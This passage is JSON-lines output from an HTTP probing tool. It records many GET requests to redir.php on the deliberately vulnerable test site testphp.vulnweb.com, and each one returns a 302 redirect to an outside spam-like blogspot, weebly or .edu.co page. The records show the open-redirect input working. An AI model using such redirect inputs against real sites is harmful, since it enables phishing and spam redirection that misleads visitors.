",\"location\":\"http://https://seonews1635.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1635.blogspot.com//\",\"time\":\"352.184968ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:47.272672886Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1648.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1648.blogspot.com//\",\"location\":\"http://https://seonews1648.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1648.blogspot.com//\",\"time\":\"343.008944ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:47.325576584Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1681.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1681.blogspot.com//\",\"location\":\"http://https://seonews1681.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1681.blogspot.com//\",\"time\":\"352.154891ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:49.003662414Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1682.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1682.blogspot.com//\",\"location\":\"http://https://seonews1682.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1682.blogspot.com//\",\"time\":\"360.646554ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:50.286832363Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1684.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1684.blogspot.com//\",\"location\":\"http://https://seonews1684.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1684.blogspot.com//\",\"time\":\"344.416908ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:50.34820004Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1688.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1688.blogspot.com//\",\"location\":\"http://https://seonews1688.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1688.blogspot.com//\",\"time\":\"352.032361ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:50.674885718Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1692.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1692.blogspot.com//\",\"location\":\"http://https://seonews1692.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1692.blogspot.com//\",\"time\":\"339.577414ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:51.534687605Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1693.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1693.blogspot.com//\",\"location\":\"http://https://seonews1693.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1693.blogspot.com//\",\"time\":\"348.393505ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:51.560311329Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1697.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1697.blogspot.com//\",\"location\":\"http://https://seonews1697.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1697.blogspot.com//\",\"time\":\"342.082874ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:51.610949913Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1700.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1700.blogspot.com//\",\"location\":\"http://https://seonews1700.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1700.blogspot.com//\",\"time\":\"346.949379ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:51.611368638Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1698.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1698.blogspot.com//\",\"location\":\"http://https://seonews1698.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1698.blogspot.com//\",\"time\":\"350.065575ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:51.91095353Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1726.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1726.blogspot.com//\",\"location\":\"http://https://seonews1726.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1726.blogspot.com//\",\"time\":\"354.651459ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:51.972833878Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1732.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1732.blogspot.com//\",\"location\":\"http://https://seonews1732.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1732.blogspot.com//\",\"time\":\"354.746096ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:51.98562725Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1735.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1735.blogspot.com//\",\"location\":\"http://https://seonews1735.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1735.blogspot.com//\",\"time\":\"354.15995ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:52.067230554Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1736.blogspot.com//\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://https://seonews1736.blogspot.com//\",\"location\":\"http://https://seonews1736.blogspot.com//\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://https://seonews1736.blogspot.com//\",\"time\":\"354.99248ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:52.085866131Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://hukazotu.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://hukazotu.blogspot.com/\",\"location\":\"http://hukazotu.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://hukazotu.blogspot.com/\",\"time\":\"343.168615ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:52.182589633Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://ieciudaddeasis.edu.co/aula/main/upload/users/2/2333/my_files/bocoran-game-slot-pra\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://ieciudaddeasis.edu.co/aula/main/upload/users/2/2333/my_files/bocoran-game-slot-pra\",\"location\":\"http://ieciudaddeasis.edu.co/aula/main/upload/users/2/2333/my_files/bocoran-game-slot-pra\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://ieciudaddeasis.edu.co/aula/main/upload/users/2/2333/my_files/bocoran-game-slot-pra\",\"time\":\"343.140567ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:52.250914538Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal06.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal06.weebly.com\",\"location\":\"http://indonesianormal06.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal06.weebly.com\",\"time\":\"355.966857ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:52.30785913Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal07.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal07.weebly.com\",\"location\":\"http://indonesianormal07.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal07.weebly.com\",\"time\":\"339.35207ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:52.352674774Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal08.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal08.weebly.com\",\"location\":\"http://indonesianormal08.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal08.weebly.com\",\"time\":\"348.413425ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:52.428968228Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal09.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal09.weebly.com\",\"location\":\"http://indonesianormal09.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal09.weebly.com\",\"time\":\"346.698582ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:52.504902532Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal10.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal10.weebly.com\",\"location\":\"http://indonesianormal10.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal10.weebly.com\",\"time\":\"351.102465ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:52.595459916Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal11.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal11.weebly.com\",\"location\":\"http://indonesianormal11.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal11.weebly.com\",\"time\":\"346.348912ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:55.78457291Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal12.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal12.weebly.com\",\"location\":\"http://indonesianormal12.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal12.weebly.com\",\"time\":\"348.263095ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:55.973478145Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal13.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal13.weebly.com\",\"location\":\"http://indonesianormal13.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal13.weebly.com\",\"time\":\"342.509755ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:56.03788933Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal14.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal14.weebly.com\",\"location\":\"http://indonesianormal14.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal14.weebly.com\",\"time\":\"356.069427ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:56.080976626Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal15.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal15.weebly.com\",\"location\":\"http://indonesianormal15.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal15.weebly.com\",\"time\":\"339.919384ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:56.457567456Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal16.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal16.weebly.com\",\"location\":\"http://indonesianormal16.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal16.weebly.com\",\"time\":\"356.368205ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:56.872419921Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal17.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal17.weebly.com\",\"location\":\"http://indonesianormal17.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal17.weebly.com\",\"time\":\"355.741845ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:56.908113549Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal18.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal18.weebly.com\",\"location\":\"http://indonesianormal18.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal18.weebly.com\",\"time\":\"355.665351ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:57.084655145Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal19.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal19.weebly.com\",\"location\":\"http://indonesianormal19.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal19.weebly.com\",\"time\":\"342.833574ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:57.628100162Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal20.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal20.weebly.com\",\"location\":\"http://indonesianormal20.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal20.weebly.com\",\"time\":\"354.080494ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:57.673174793Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal21.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal21.weebly.com\",\"location\":\"http://indonesianormal21.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal21.weebly.com\",\"time\":\"345.83773ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:59.366570954Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal22.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal22.weebly.com\",\"location\":\"http://indonesianormal22.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal22.weebly.com\",\"time\":\"360.549501ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:00.64258171Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal23.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal23.weebly.com\",\"location\":\"http://indonesianormal23.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal23.weebly.com\",\"time\":\"354.411186ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:00.705767114Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal24.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal24.weebly.com\",\"location\":\"http://indonesianormal24.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal24.weebly.com\",\"time\":\"355.792838ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:01.032136041Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal25.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal25.weebly.com\",\"location\":\"http://indonesianormal25.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal25.weebly.com\",\"time\":\"354.577175ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"